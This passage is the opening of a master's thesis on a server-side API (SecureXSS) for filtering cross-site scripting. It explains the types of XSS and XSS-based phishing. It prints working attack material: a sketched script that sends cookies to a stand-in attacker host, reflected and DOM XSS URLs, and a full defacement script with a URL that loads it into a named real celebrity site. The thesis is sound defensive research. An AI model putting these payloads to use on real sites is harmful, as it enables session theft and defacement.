SERVER SIDE API TO SECURE XSS
Thesis
Submitted
in partial fulfillment of the requirements for the degree of
MASTER OF TECHNOLOGY
in
COMPUTER SCIENCE & ENGINEERING - INFORMATION SECURITY
by
KAMESH KUMAR BOGANATHAM
(07IS04F)
DEPARTMENT OF COMPUTER ENGINEERING
NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA
SURATHKAL, MANGALORE -575025
NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA, SURATHKAL
D E C L A R A T I O N
I hereby declare that the Report of the P.G. Project Work entitled “SERVER SIDE API TO SECURE XSS”, which is being submitted to the National Institute of Technology Karnataka Surathkal for the award of the degree of Master of Technology in Computer Science and Engineering – Information Security in the Department of Computer Engineering, is a bonafide report of the work carried out by me. The material contained in this report has not been submitted to any university or institution for the award of any degree.
07IS04F, B KAMESH KUMAR
(Register Number, Name and Signature of Student)
Department of Computer Engineering
Place: NITK, SURATHKAL
Date:
C E R T I F I C A T E
This is to certify that the P.G. Project Work Report entitled “SERVER SIDE API TO SECURE XSS” submitted by B KAMESH KUMAR (Reg.No. 07IS04F) as the record of the work carried out by him, is accepted as the P.G. Project Work Report Submission in partial fulfillment of the requirements for the award of degree of Master of Technology in Computer Science and Engineering – Information Security in the Department of Computer Engineering, National Institute of Technology Karnataka, Surathkal.
External Guide
(Mr. Radhesh Mohandas) Adjunct Faculty
Department of Computer Engineering NITK Surathkal
Internal Guide
(Mr. Alwyn R Pais) Senior Lecturer
Department of Computer Engineering NITK Surathkal
DEDICATED TO
THEIR LORDSHIPS
ACKNOWLEDGEMENTS
I take this opportunity to express my deepest gratitude and appreciation to all those who have helped me directly or indirectly towards the successful completion of this project.
First and foremost, I would like to express my sincere appreciation and gratitude to my esteemed guides Mr. Radhesh Mohandas, Adjunct Faculty and Mr. Alwyn R Pais, Senior Lecturer, Department of Computer Engineering, NITK Surathkal for their insightful advice, encouragement, guidance, criticism, and valuable suggestions throughout the course of my project work. Without their continued support and interest, this thesis would not have been the same as presented here.
I express my deep gratitude to Mr. K. Vinay Kumar, Asst. Professor and Head, Department of Computer Engineering, National Institute of Technology Karnataka, Surathkal for his constant co-operation, support and for providing necessary facilities throughout the M.Tech program.
I would like to take this opportunity to express my thanks towards the teaching and non-teaching staff in Department of Computer Engineering, NITK for their invaluable help and support in these two years of my study. I am also grateful to all my classmates for their help, encouragement and invaluable suggestions.
My special thanks to my parents, supporting family and friends who continuously supported and encouraged me in every possible way for successful completion of this thesis. I am forever indebted to you all.
ABSTRACT
With the Internet becoming ubiquitous in every aspect of our lives, there has been an increase in web applications providing day-to-day services like banking, shopping, mailing services, news updates, etc. However, most of these applications have vulnerabilities or security loopholes, such as Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF) and SQL Injection, which are exploited by attackers for malicious purposes. Hence there is a need for APIs and automated security tools to identify and/or prevent these vulnerabilities before an application goes live.
This work focuses on developing a server-side API for Cross-site Scripting that differentiates an XSS attack from a simple script. Thus novice users can enjoy a safe and better browsing experience without any loss of functionality and without the need for additional software or configuration on the browser side. Such an API also reduces the burden on web administrators of safeguarding their web applications from malignant XSS attacks.
Keywords: Web Applications, Cross-site Scripting (XSS), Cross-site Request forgery (CSRF/XSRF), Server-side XSS Filter.
TABLE OF CONTENTS
Declaration
Certificate
Dedication
Acknowledgements
Abstract
Table of Contents
List of Figures
List of Tables
Nomenclature/Acronyms
Chapter I INTRODUCTION
  1.1 Cross-site Scripting Attacks
  1.2 Motivation
  1.3 Organization of Thesis
Chapter II CROSS-SITE SCRIPTING
  2.1 Introduction to Cross-site Scripting
  2.2 A Basic Example
  2.3 Malicious Code
  2.4 Classification of Cross-site Scripting
    2.4.1 Reflected XSS
    2.4.2 Stored XSS
    2.4.3 DOM-based XSS
  2.5 Threats from Cross-site Scripting
  2.6 Cross-site Scripting and Phishing
    2.6.1 Introduction to Phishing
    2.6.2 Phishing Tricks
    2.6.3 Cross-Site Scripting based Phishing Attack
  2.7 Real World Examples
  2.8 XSS Vs. CSRF
Chapter III EXISTING XSS DEFENSES
  3.1 AntiSamy
  3.2 The strip_tags()
  3.3 PHP Input Filter
  3.4 HTML_Safe/SafeHTML
  3.5 Kses
  3.6 htmLawed
  3.7 Safe HTML Checker
  3.8 HTML Purifier
  3.9 Summary
Chapter IV PROBLEM STATEMENT
Chapter V DIFFERENTIATING XSS FROM SIMPLE SCRIPTS
Chapter VI IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS
  6.1 Procedure
  6.2 Implementation Details
  6.3 Working of SecureXSS
  6.4 Results
REFERENCES
APPENDIX I OWASP The Ten Most Critical Web Application Security Vulnerabilities
APPENDIX II Results of SecureXSS API
APPENDIX III Results of HTML Purifier
APPENDIX IV Simple HTML DOM Parser array
LIST OF FIGURES
Fig. No. Description
2.1 Sample PHP Code for Site Search Engines
2.2 Sample HTTP Response Page Containing the <SCRIPT> Tag
2.3 Cross-Site Scripting in Site Search Engines
2.4 Sample Malicious Code for Cookie Theft
2.5 An Attack Scenario of Cross-Site Scripting
2.6 Examples of Phishing Tricks
2.7 Cross-Site Scripting based Phishing Attack
2.8 Maria Sharapova’s Home Page
2.9 Defacement
6.1 Server-side XSS Filtering API
6.2 SecureXSS overhead
LIST OF TABLES
Table No. Description
3.1 Kses API’s
5.1 Tags and its attributes which are in favour of attackers
5.2 Extensions allowed
5.3 DOM Properties which will cause XSS attacks
6.1 SecureXSS timing test (overhead) results
1 OWASP Top 10 Web Application Vulnerabilities
2 Results of SecureXSS
Nomenclature/Acronyms
Notation Description
XSS Cross-site Scripting
OWASP Open Web Application Security Project
XSRF/CSRF Cross-site Request Forgery
PHP Hypertext Preprocessor
URL Uniform Resource Locator
URI Uniform Resource Identifier
HTML HyperText Markup Language
CHAPTER 1
INTRODUCTION
With the proliferation of the Internet, there has been a surge in web services offered by corporations, such as e-banking and e-shopping. As most of these applications are not developed following best security practices, there is an increase in malicious attacks against these services, which exploit the vulnerabilities in these applications to acquire material gains or to steal the credentials of the novice users who use them. This has led to more research focus in this domain on new tools and techniques to thwart these kinds of attacks. Many research groups in academia and industry are working in this domain to find more secure programming practices, and tools that identify the vulnerabilities of these applications during the development phase and detect attacks at run time.
The OWASP Top 10 report [OWA] lists the following as the ten most critical web application security vulnerabilities being exploited:
1. Cross Site Scripting (XSS)
2. Injection Flaws (SQL Injection, XPath Injection, LDAP Injection, etc.)
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross Site Request Forgery (CSRF)
6. Information Leakage and Improper Error Handling
7. Broken Authentication and Session Management
8. Insecure Cryptographic Storage
9. Insecure Communications
10. Failure to Restrict URL Access
In this work, we focused on Cross-site Scripting (XSS), which allows an attacker to insert malicious script into a web application, where it may cause any kind of harm to legitimate users. In the process, we developed a server-side XSS filtering API, which differentiates a potential XSS attack from a simple script and strips the attack off. The main goal of this work is to provide an XSS solution that helps web administrators safeguard their applications from attackers, resulting in a safer and better browsing experience for novice users without any loss of functionality.
1.1 Cross-site Scripting Attacks
The cross-site scripting attack method was first discussed in a CERT advisory back in 2000 [CER]. But even today, cross-site scripting (XSS) is one of the most common vulnerabilities in web applications. It results from insufficient filtering of data that is received from a malicious party and then sent on to third parties. Systems that receive data from users and display it in other users' browsers are highly vulnerable to XSS attacks. Wikis, forums, chats and web mail are all good examples of applications that are most susceptible to XSS.
Cross-site scripting (XSS) can be defined as a security exploit in which an attacker inserts malicious code into a page returned by a web server that the user trusts. This code may reside on the web server or be explicitly inserted when the user browses to the particular web site; it may contain JavaScript or just HTML, and it may use third-party sites as sources or rely only upon the resources of the targeted server. XSS attacks typically involve JavaScript code from a malicious web server executing in a user's web browser. Chapter 2 describes XSS attacks and their types, with examples and illustrations.
1.2 Motivation
In recent years, dynamic Web applications such as online banking systems and online shops have become more and more popular. At the same time, security attacks that exploit Web application vulnerabilities are increasing dramatically. Among such vulnerabilities, Cross-Site Scripting is the most common security issue (as noted above, it is the top vulnerability in the OWASP 2007 report); it enables attackers to steal credentials from a victim, gather sensitive information or make a Web site unavailable. To mitigate such serious impact, Web applications need an effective solution for Cross-Site Scripting flaws. Manual security testing, however, is both expensive and error prone due to the increasing complexity of Web applications. Hence, automated tools for detecting Cross-Site Scripting flaws are essential.
We have investigated some available solutions that claim to be state-of-the-art. Unfortunately, most of them are not effective, as they fail to differentiate simple scripts from potential XSS attacks. Therefore, we have developed SecureXSS (pronounced “Secure Excess”), an open-source server-side filter for detecting and filtering Cross-Site Scripting vulnerabilities in Web applications.
1.3 Organization of Thesis
The rest of the thesis is organized as follows. Chapter 2 gives a brief overview of XSS attacks and their types, with live examples and illustrations. Chapter 3 deals with the available solutions for XSS, while Chapter 4 describes the problem statement. Chapter 5 details our solution to mitigate XSS, called SecureXSS: Server-side XSS Filter. Chapter 6 gives the implementation details and experimental results, and Chapter 7 concludes the thesis along with future work, followed by the references. Appendix I details the Top 10 most critical web application vulnerabilities. Appendix II shows the results of the SecureXSS API, while Appendix III shows the results of HTML Purifier and Appendix IV lists the Simple HTML DOM Parser array.
CHAPTER 2
CROSS-SITE SCRIPTING
Cross-Site Scripting vulnerabilities are quite widespread. A look at the Bugtraq mailing list shows postings that report new Cross-Site Scripting holes on a regular basis. As mentioned in Chapter 1, Cross-Site Scripting vulnerabilities are the most common security loopholes, found in over 80 percent of Web sites. Hence, the likelihood that a Web site is XSS vulnerable is extremely high. According to the Information-Technology Promotion Agency (IPA), from July 2004 to September 2005 Cross-Site Scripting was the most serious issue among all Web application attacks (accounting for 42%), while SQL Injection ranked second with 16%. Thus, it is imperative to make Web applications secure against XSS attacks.
In this chapter, we start by briefly explaining the XSS problem with a basic example, and then we give an introduction to malicious code and how XSS attacks work. After presenting the classification of XSS, we describe the risks that XSS may cause.
2.1 Introduction to Cross-site Scripting
As introduced in the previous chapter, Web applications are becoming not only increasingly popular, but also more and more vulnerable. Attack techniques exploiting various types of Web application vulnerabilities are becoming more and more sophisticated. A particular class of these attack techniques is referred to as Cross-Site Scripting (or HTML Code Injection), which takes advantage of Web applications that do not validate user input before displaying it back to the user. Such attacks commonly involve three parties: the user (victim), the attacker, and the XSS-vulnerable website. The attacker uses the poorly designed legitimate website as a vehicle to execute malicious code in the user’s browser, as if the code originated from a trusted source.
As explained above, XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input given by a user in the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute it. Because the browser believes the script came from a trusted source, the malicious script can access cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page [XSS].
2.2 A Basic Example
Many web applications contain site search engines. Such site search engines usually display the results on the screen together with the search phrase entered by the user. As an example, consider the PHP code shown in figure 2.1, in which the text after “Search results for” is generated dynamically from the user input. When the search phrase (user input) is not sanitized properly, Cross-Site Scripting may occur, which can be exploited for an attack. As illustrated in figure 2.3 (a), after clicking on the search button, we get the search phrase entered in the form field (here search text) displayed in the response page, regardless of the search results. Next we experiment with HTML tags: as illustrated in figure 2.3 (b), when we enter Hello World embedded in the HTML tag <b>, the returned search phrase is displayed as bold Hello World instead of the text we entered. Besides displaying a formatted search phrase, we can also cause JavaScript code to be executed in the browser (most browsers enable JavaScript by default). As illustrated in figure 2.3 (c), instead of the search phrase being shown, a JavaScript alert box with the text XSS Vulnerability pops up. This is because the browser interprets the search phrase we entered as HTML rather than as text. In the sample HTTP response page shown in figure 2.2, the <SCRIPT> tag introduces a JavaScript program, which is therefore executed rather than displayed by the browser.
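Because the PHP code of figure 2.1 is not reproduced here, the following is a minimal JavaScript (Node.js) sketch of the same situation, not the original code. The function names escapeHtml, renderSearchPageUnsafe and renderSearchPageSafe are hypothetical. The unsafe version copies the search phrase into the page verbatim, as in figure 2.3 (b) and (c); the safe version HTML-encodes the characters that would otherwise let the browser parse the input as markup.

```javascript
// Replace the characters that are significant in HTML with entities,
// so the browser displays user input as text instead of parsing it as markup.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;") // first, so entities added below are not double-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the search phrase is inserted into the page exactly as received.
function renderSearchPageUnsafe(phrase) {
  return "<p>Search results for " + phrase + "</p>";
}

// Encoded: the search phrase is HTML-encoded before it is inserted.
function renderSearchPageSafe(phrase) {
  return "<p>Search results for " + escapeHtml(phrase) + "</p>";
}

const phrase = '<script>alert("XSS Vulnerability")</script>';
console.log(renderSearchPageUnsafe(phrase)); // the <script> tag reaches the browser intact
console.log(renderSearchPageSafe(phrase));   // the tag is delivered as literal text
```

Encoding of this kind turns every script into inert text, harmless ones included. It is shown only to explain why the input in figure 2.3 (c) executes; it is not the SecureXSS approach, which aims to strip potential attacks while keeping simple scripts.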
2.3 Malicious Code
Considering the example above, one may ask: it just throws up an alert box, so how dangerous can it be? Admittedly, alert pop-ups are merely annoying and do not cause security issues by themselves; we use them only to demonstrate that a Web application is vulnerable to XSS. If the JavaScript alert function can be executed, there is usually no reason why other JavaScript functions containing malicious code cannot be executed as well.
Figure 2.1: Sample PHP Code for Site Search Engines
Figure 2.2: Sample HTTP Response Page Containing the <SCRIPT> Tag
(a) Search for a Simple Text
(c) Search for an Executable Script
Figure 2.3: Cross-Site Scripting in Site Search Engines
Attackers exploit XSS vulnerabilities in order to execute the injected malicious code. What exactly does malicious code mean, and what impact can it have? The following paragraphs give an introduction to malicious code.
By default, most Web browsers run scripts embedded in Web pages downloaded from a Web server. Such scripts are usually written in scripting languages such as JavaScript and VBScript and are introduced by the HTML scripting tag <SCRIPT>. In addition to the scripting tags, many other HTML tags (like the <IMG> tag) can be misused to load malicious code.
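To see why a defence must look beyond the <SCRIPT> tag, consider the following deliberately naive JavaScript filter (the hypothetical stripScriptTags) that deletes only <script>...</script> blocks. A payload carried in the onerror attribute of an <IMG> tag passes through untouched; the browser typically runs the handler when the image source fails to load. This is an illustrative sketch, not one of the defences surveyed in Chapter 3.

```javascript
// Deliberately naive blacklist filter: removes <script>...</script> blocks only.
function stripScriptTags(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, "");
}

const scriptPayload = "<script>alert(document.cookie)</script>";
// "x" is normally not a loadable image, so the browser fires onerror and runs
// the JavaScript in the attribute without any <script> tag being present.
const imgPayload = '<img src="x" onerror="alert(document.cookie)">';

console.log(stripScriptTags("Hi " + scriptPayload)); // "Hi "
console.log(stripScriptTags("Hi " + imgPayload));    // unchanged: the IMG vector survives
```

Chapter 1 notes that existing solutions fail to differentiate simple scripts from potential XSS attacks; a tag blacklist like this one fails in the other direction, by letting attacks through.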
Malicious code is able to rewrite an HTML page with fraudulent content or redirect the client’s browser to the attacker's page; it can even access authentication cookies, session management tokens, or other sensitive information. With this information, an attacker is able to hijack the victim’s active session and thus bypass the authentication process completely. Consider the script in figure 2.4: when this script is successfully injected into a page of the site (e.g. www.xss.site) and a victim’s browser loads this page, the embedded script is executed and steals the victim’s cookie for this site. The attacker is then able to access the victim’s account and masquerade as the victim. Figure 2.5 illustrates this scenario.
Figure 2.5: An Attack Scenario of Cross-Site Scripting
The steps shown in Figure 2.5 are explained below in detail.
(1) A user logs in to an XSS-vulnerable site.
(2) The site sets a cookie (e.g. ID=123) for the user, which is saved in the browser.
(3) An attacker who knows that the site displays a parameter (e.g. the parameter “name”) without validating it constructs a link with the malicious code described in figure 2.4 and tricks the user into clicking on this link.
(4) The unsuspecting user clicks on the link and an HTTP request containing the attacker's malicious code is sent to the XSS-vulnerable site.
(5) In response to the request, the site generates a response page with the malicious code embedded and displays this page to the user.
(6) While the user views the response page, the malicious code is executed in the user’s browser and the cookies for that web site are sent to the attacker.
(7) The attacker now has access to the user’s account and can masquerade as the user.
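Steps (3) to (5) can be sketched in JavaScript with the standard URL and URLSearchParams classes. The host www.xss.site and the parameter name come from the text; the path /welcome.php, the collector address attacker.example, the payload (a stand-in for figure 2.4, which is not reproduced here) and the function names are assumptions made for illustration.

```javascript
// Step (3): the attacker places the payload in the unvalidated "name" parameter.
// URLSearchParams percent-encodes it, so the link looks like an ordinary URL.
function craftMaliciousLink(baseUrl, payload) {
  const url = new URL(baseUrl);
  url.searchParams.set("name", payload);
  return url.href;
}

// Steps (4) and (5): the vulnerable site decodes the parameter and copies it,
// unvalidated, into the response page returned to the victim.
function vulnerableResponse(requestUrl) {
  const name = new URL(requestUrl).searchParams.get("name");
  return "<html><body>Welcome, " + name + "</body></html>";
}

// Hypothetical payload: would send the victim's cookies (e.g. ID=123) to the attacker.
const payload =
  "<script>new Image().src='http://attacker.example/steal?c='+document.cookie</script>";

const link = craftMaliciousLink("http://www.xss.site/welcome.php", payload);
console.log(link);                     // the payload appears only in encoded form
console.log(vulnerableResponse(link)); // the decoded <script> is back in the page
```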
The possible sources of malicious code include the URL query string, HTML form fields, HTTP headers and cookies, etc. Since malicious code is embedded in the user’s trusted websites, it can perform dangerous operations unhindered. Websites using SSL are no better protected against malicious code than other websites. SSL only encrypts the data (including the malicious code) transmitted over the connection; it does not attempt to validate the data. Therefore, XSS attacks work as usual, except that they occur over an encrypted connection.
2.4 Classification of Cross-site Scripting
Generally, Cross-Site Scripting attacks can be classified into three categories: Reflected (non-persistent), Stored (persistent) and DOM-based. Before describing these categories, we briefly introduce the DOM, which is needed to understand the third type of XSS.
The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. Objects under the DOM (also sometimes called "Elements") may be specified and addressed according to the syntax and rules of the programming language used to manipulate them. In simple terms, the Document Object Model is the way JavaScript sees its containing HTML page and browser state. Next, we will describe these three categories respectively.
2.4.1 Reflected XSS
Reflected XSS (also referred to as non-persistent XSS) is by far the most common type. It means that the malicious code sent in a request is returned to the Web browser immediately, in the page generated for that request.
Normally, a non-persistent XSS attack requires deceiving a user into visiting a specially manipulated URL with embedded malicious code using social engineering techniques. When a user is tricked into clicking on the malicious link, it causes the code embedded in the URL to be executed in the Web browser, and the attack is achieved.
2.4.2 Stored XSS
In contrast to reflected XSS, stored XSS (also referred to as persistent XSS) means that malicious code injected into a website is stored (in a database or XML files) over a longer period and displayed to users in a web page later. This kind of XSS is more serious than the other types, because an attacker can inject malicious code just once and affect a large number of unsuspecting users; it is hardly even necessary for attackers to trick users into clicking on a link containing malicious code. For example, if the malicious code is stored in a database, an innocent user may become a victim without clicking on any link, just by viewing the page that contains the stored malicious code.
There is another kind of stored XSS that uses techniques to manipulate the user’s cookies. With such techniques, attackers are able to tamper with the cookie content, inserting malicious code, and cause the code to be executed each time the user visits the website.
Web applications that are especially vulnerable to stored XSS include discussion forums, guest books, webmail systems, etc. RSS feeds, which are popular with web blogs and news sites, can also be used as a vehicle for such attacks.
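The persistence that distinguishes stored XSS can be illustrated with a short JavaScript sketch of a hypothetical guestbook, in which an in-memory array stands in for the database and all names are invented for illustration: a single unfiltered entry is included in the page built for every later visitor, without any malicious link being involved.

```javascript
// In-memory stand-in for the guestbook table in a database.
const guestbook = [];

// The application stores whatever is submitted, without filtering.
function postEntry(author, message) {
  guestbook.push({ author, message });
}

// Every visitor receives a page built from all stored entries.
function renderGuestbook(viewer) {
  const entries = guestbook
    .map((e) => "<li>" + e.author + ": " + e.message + "</li>")
    .join("");
  return "<h1>Guestbook for " + viewer + "</h1><ul>" + entries + "</ul>";
}

// The attacker submits the payload once...
const storedPayload = "<script>alert('XSS')</script>";
postEntry("mallory", storedPayload);
postEntry("alice", "Nice site!");

// ...and it is delivered to each user who merely views the page.
const visitors = ["bob", "carol", "dave"];
const affected = visitors.filter((v) => renderGuestbook(v).includes(storedPayload));
console.log(affected.length + " of " + visitors.length + " visitors received the script");
```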
Here is a real-world example of a persistent XSS attack that occurred on eBay, the most popular online auction website. As reported by US-CERT in April 2006, when an eBay user posted an auction, <SCRIPT> tags were allowed in the auction description, which created an XSS vulnerability in the eBay Web site. Attackers exploited this vulnerability to redirect auction viewers to a fake eBay login page that requested login information in order to steal credentials [USC].
2.4.3 DOM – based XSS
Besides the XSS attacks described above, which are considered standard XSS, there is a third kind of XSS attack, namely DOM-based XSS. Unlike standard XSS attacks, which rely on dynamic web pages, a DOM-based XSS attack does not necessarily require sending malicious code to the server, and can therefore also exploit static HTML pages.
The problem lies in client-side script (i.e. JavaScript) within the page itself, which retrieves data from certain DOM objects without encoding the URL characters. The DOM objects mentioned here include:
- document.location
- document.URL
- document.referrer
We make this clear by means of a simple example. Assume that the following script resides within an HTML page; it displays the text retrieved from the current URL somewhere in the page.
<SCRIPT>document.write(document.URL);</SCRIPT>
When we enter the following URL into the address bar of a browser, we get an alert box with the text “XSS”, which demonstrates the XSS hole.
http://www.xss.site/index.html#<script>alert("XSS")</script>
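Why the server never sees this payload can be made concrete with a JavaScript sketch using the standard URL class of Node.js; the helper names are hypothetical. The HTTP request target contains only the path and query string, so the fragment after # stays in the browser, while a script reading the URL can still recover it. Node's URL parser, which follows the WHATWG URL Standard, percent-encodes < > and " in the fragment, so the sketch decodes the fragment with decodeURIComponent, as a page script would have to in that case.

```javascript
// The HTTP request target contains only the path and the query string:
// the fragment after "#" is not sent to the server.
function requestTarget(urlString) {
  const url = new URL(urlString);
  return url.pathname + url.search;
}

// What a page script can recover from the fragment if it decodes it,
// e.g. decodeURIComponent(location.hash.slice(1)) in a browser.
function fragmentSeenByPage(urlString) {
  return decodeURIComponent(new URL(urlString).hash.slice(1));
}

const attackUrl = 'http://www.xss.site/index.html#<script>alert("XSS")</script>';
console.log(requestTarget(attackUrl));      // "/index.html": no payload reaches the server
console.log(fragmentSeenByPage(attackUrl)); // <script>alert("XSS")</script>
```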
2.5 Threats from Cross-site Scripting
Some of the common threats from XSS attacks are listed below:
Cookie theft and account hijacking: one of the most severe XSS attacks involves cookie theft and account hijacking, as in the scenario illustrated in figure 2.5. Credentials stored in cookies can be stolen by attackers, making it possible for them to steal a user’s identity and access his confidential information. For normal users, this means that personal data such as credit card information or bank accounts may be misused. For users with high privileges, such as administrators, if their accounts are stolen via XSS, attackers are able to access the web server and the back-end database system, and thus gain full control of the web application.
Misinformation: another critical threat from XSS is the danger of credentialed misinformation. XSS attacks may include malicious code that spies on a user’s surfing behaviour and thus gathers statistics (e.g. logging the user’s clicks or history of visited sites), resulting in a loss of privacy. Another kind of misinformation arises because malicious code is able to modify the presentation of page content once it is executed in a browser. This enables an attacker to manipulate a press release or important news, or even to affect a company's stock price, which results in a loss of integrity. Combined with Phishing, malicious script may also modify the login page, so that a victim unknowingly submits his login information to the attacker.
Denial of Service: from an enterprise's point of view, it is imperative that its Web applications be accessible at all times. However, malicious script can lead to a loss of availability; for example, it can redirect users’ browsers to other websites. The spread of the XSS worm on Myspace.com is another example of a Denial of Service attack. From the users' point of view, malicious script can also make a browser crash or become inoperable (e.g. by throwing an endless series of alert boxes), so that the user cannot reach the Web application any more.
Browser exploitation: malicious script can redirect client browsers to an attacker’s site, where the attacker can take advantage of specific security holes in web browsers to control the user’s computer by executing arbitrary commands, such as installing Trojan horse programs on the client or uploading local data containing sensitive information.
2.6 Cross-site Scripting and Phishing
This part of the thesis briefly explains phishing attacks based on cross-site scripting. Section 2.6.1 introduces phishing, Section 2.6.2 explains some common phishing tricks, and Section 2.6.3 explains cross-site scripting based phishing attacks.
2.6.1 Introduction to Phishing
Phishing (as in fishing for sensitive data) is the act of tricking someone into giving up sensitive information such as credit card numbers, passwords, bank account information, or other personal data using social engineering techniques [STA, OLL].
Phishing usually uses e-mail as its medium: messages that appear to come from banks ask users to log into their online-banking system, change their password, or enter their credit card number. In recent years, Phishing has become a major issue; according to the Pew study [PEW], in October 2005 more than a third of e-mail users had been targeted by Phishing, and two percent had responded by providing personal financial information.
(a) Similar or Misspelled Domain Names
(b) URL Hex Encoding
(c) Using HTML Coding to Hide the Real Link
Figure 2.6: Examples of Phishing Tricks
2.6.2 Phishing Tricks
Tricks commonly used for Phishing include:
Similar or misspelled domain names (see figure 2.6(a)). Phishers may also substitute a lowercase “l” with an uppercase “I”, because the two are hard for users to distinguish.
Using encoded URLs. The URL is encoded using Hex, Unicode, or UTF-8 encoding to disguise its true value. An example of Hex encoding is illustrated in figure 2.6(b).
Using HTML coding to hide the real link (see figure 2.6(c)). The real link is not directly visible to the user; as soon as he clicks the link, he is taken to the attacker's fake site instead of the site indicated.
Using fake banner advertising. Phishers can copy banner advertisements and publish them on the Internet. As with the previous trick, the link leads to the fake site, and the destination is not directly visible to the users.
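The hex-encoding trick of figure 2.6(b) can be reproduced with a small JavaScript sketch (the helper hexEncode is hypothetical and handles ASCII input only): each character becomes its %XX escape, which the browser decodes back to the same text while a reader sees only hex digits.

```javascript
// Replace every character of an ASCII string with its %XX hex escape.
function hexEncode(text) {
  return Array.from(text, (ch) => {
    const code = ch.charCodeAt(0);
    if (code > 0x7f) throw new RangeError("this sketch handles ASCII only");
    return "%" + code.toString(16).toUpperCase().padStart(2, "0");
  }).join("");
}

const hidden = hexEncode("login");
console.log(hidden);                     // "%6C%6F%67%69%6E"
console.log(decodeURIComponent(hidden)); // "login": the true value is recovered
```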
2.6.3 Cross-Site Scripting based Phishing Attack
The Phishing tricks described above misdirect users to fake sites. If, however, the Phishing page is served by the real site, the attack is more dangerous, since users trust the real site. Such attacks are possible when a site is XSS vulnerable. The following example demonstrates this kind of attack.
A Cross-site Scripting based Phishing attack involves the following steps:
1. Find Cross-site Scripting vulnerabilities in a site.
2. Embed malicious content into a fraudulent email. The attacker may use an encoded URL to obfuscate the true destination.
3. Send the spoofed email to victims.
When a user clicks the link in the spoofed email, the login part of the page returned is replaced with the fake login page from the attacker’s site, other contents of the page and the address bar remain unchanged. The user is not aware of this and logs in with his personal information, which will be sent to the attacker. After login, the user will be redirected back to the real site. Figure 2.7 illustrates this scenario.
XSS based Phishing attacks can bypass the traditional Phishing defenses such as blacklists, SSL notices, etc. The first step to achieve XSS based Phishing attack is to find XSS vulnerabilities in an insecure Web site.
2.7 Real World Examples
On April 1, 2007, there was an interesting prank on the home page of Maria Sharapova, the famous tennis player (Figure 2.8). Apparently someone had identified an XSS vulnerability, which was used to inform Maria’s fan club that she was quitting her career in tennis to become a Cisco CCIE security expert.
http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/script%3E%3C!--&pagenumber=1
Notice that the actual XSS vulnerability affects the page GET parameter, which is also URL-encoded. In its decoded form, the value of the page parameter looks like this:
// --></script><script src=http://www.securitylab.ru/upload/story.js></script><!--
The XSS payload is quite simple. The leading character sequence // --></script> terminates the script block into which the page writes the parameter. The second part of the payload includes a remote script hosted at www.securitylab.ru. Finally, the trailing <!-- opens an HTML comment, which makes the rest of the page disappear.
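The decoding can be checked with the standard URL and URLSearchParams classes in JavaScript (Node.js or a browser). This sketch only parses the attack URL from the text; it makes no request.

```javascript
// Attack URL from the Maria Sharapova example (page parameter URL-encoded).
const attackUrl =
  "http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E" +
  "%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/script%3E%3C!--" +
  "&pagenumber=1";

// searchParams splits the query on "&" and percent-decodes each value.
const page = new URL(attackUrl).searchParams.get("page");
console.log(page); // the decoded payload quoted in the text
```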
Figure 2.8 Maria Sharapova’s Home Page
The script hosted at SecurityLab has the following content:
document.write("<h2><font color=#FFFFFF>Maria Sharapova</font></h2>");
document.write("<font color=#FFFFFF>Maria Sharapova is glad to announce you her new decision, which changes her all life for ever. Maria has decided to quit the " +
  "carrier in Tennis and become a Security Expert. She already passed Cisco exams and now she has status of an official CCIE.</font><p><img " +
  "src=http://www.securitylab.ru/_Article_Images/sharapova01.jpg><p><font " +
  "color=#FFFFFF>Maria is sure, her fans will understand her decision and will respect it. Maria already accepted proposal from DoD and will work for the US government. She also will help Cisco to investigate computer crimes and hunt hackers " +
  "down.</font></p><p><img " +
  "src=http://www.securitylab.ru/_Article_Images/sharapova02.jpg></p><p><!--");
Let’s have a look at the following example provided by RSnake from ha.ckers.org. RSnake hosts a simple script (http://ha.ckers.org/weird/stallowned.js) that performs XSS defacement on every page where it is included. The script is defined like this:
var title = "XSS Defacement";
var bgcolor = "#000000";
var image_url = "http://ha.ckers.org/images/stallowned.jpg";
var text = "This page has been Hacked!";
var font_color = "#FF0000";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
  // Wipe the original page and apply the new title and background colour
  document.title = pageTitle;
  document.body.innerHTML = '';
  document.bgColor = bgColor;
  // Centred container that holds the defacement text, image and footer
  var overLay = document.createElement("div");
  overLay.style.textAlign = 'center';
  document.body.appendChild(overLay);
  var txt = document.createElement("p");
  txt.style.font = 'normal normal bold 36px Verdana';
  txt.style.color = fontColor;
  txt.innerHTML = pageText;
  overLay.appendChild(txt);
  if (image_url != "") { // tests the global image_url, not the imageUrl parameter
    var newImg = document.createElement("img");
    newImg.setAttribute("border", '0');
    newImg.setAttribute("src", imageUrl);
    overLay.appendChild(newImg);
  }
  var footer = document.createElement("p");
  footer.style.font = 'italic normal normal 12px Arial';
  footer.style.color = '#DDDDDD';
  footer.innerHTML = title; // the global title, equal to pageTitle in this call
  overLay.appendChild(footer);
}
In order to use the script we need to include it the same way we did when defacing Maria Sharapova’s home page. In fact, we can apply the same trick again. The defacement URL is:
http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E%3C!--&pagenumber=1
